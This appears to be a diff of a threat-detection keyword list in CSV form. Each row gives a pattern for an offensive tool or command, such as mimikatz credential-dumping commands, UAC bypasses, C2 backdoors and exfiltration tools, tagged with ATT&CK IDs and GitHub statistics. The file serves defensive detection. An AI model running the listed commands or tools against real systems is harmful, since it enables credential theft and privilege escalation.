- T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*--trusted-for-delegation --kdcHost *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*TrustedPath-UACBypass-BOF*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file implementation for trusted path UAC bypass. The target executable will be called without involving cmd.exe by using DCOM object.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" -"*trustedsec/social-engineer-toolkit*","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","1","N/A","N/A","10","9394","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" +"*trustedsec/social-engineer-toolkit*","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","1","N/A","N/A","10","9395","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" "*trustedsec/unicorn*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z" "*TryCatchHCF*","offensive_tool_keyword","Github Username","github repo hosting sniffing spoofing and data exfiltration tools","N/A","N/A","N/A","N/A","Data Exfiltration","https://github.com/TryCatchHCF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ts.php*vi.txt*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*ts::logonpasswords*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*ts::mstsc*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*ts::multirdp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*ts::remote*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*ts::sessions*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*ts::logonpasswords*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*ts::mstsc*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*ts::multirdp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*ts::remote*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*ts::sessions*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*tspkg/decryptor.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*TunnelGRE/Augustus*","offensive_tool_keyword","Augustus","Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.","T1055.012 - T1027.002 - T1136.001 - T1562.001","TA0005 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/TunnelGRE/Augustus","1","1","N/A","6","2","107","23","2023-08-27T10:37:51Z","2023-08-21T15:08:40Z" "*turn_keylogger*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*TVqQAAMAAAAEAAAA*","offensive_tool_keyword","base64","start of an executable payload in base64","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*TVqQAAMAAAAEAAAA*","offensive_tool_keyword","base64","start of an executable payload in base64","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*TVqQAAMAAAAEAAAA*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*twint -g=*km* -o * --csv*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*twint -u * --since *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*twittor.py*","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","10","10","743","253","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z" -"*twittor-master.zip*","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","10","10","743","253","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z" +"*twittor.py*","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","10","10","743","254","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z" +"*twittor-master.zip*","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","10","10","743","254","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z" "*TWV0YXNwbG9pdCBSUEMgTG9hZGVy*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" "*Tycx2ry/SweetPotato*","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","236","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" "*Tylous/SourcePoint*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" @@ -17885,24 +18069,24 @@ "*uac fodhelper *","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*uac sdclt *","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*uac_bypass*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" -"*uac_easinvoker.*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" -"*UACBypass -*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*uac_easinvoker.*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*UACBypass -*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*UAC-bypass*","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1","1","0","N/A","N/A","","N/A","","","" -"*uacbypass_files*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*uacbypass_files*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" "*UACBypass-BOF*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" "*UACBypassedService.exe*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" -"*uacm4gic*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*UACME-master*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*uac-schtasks *","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt 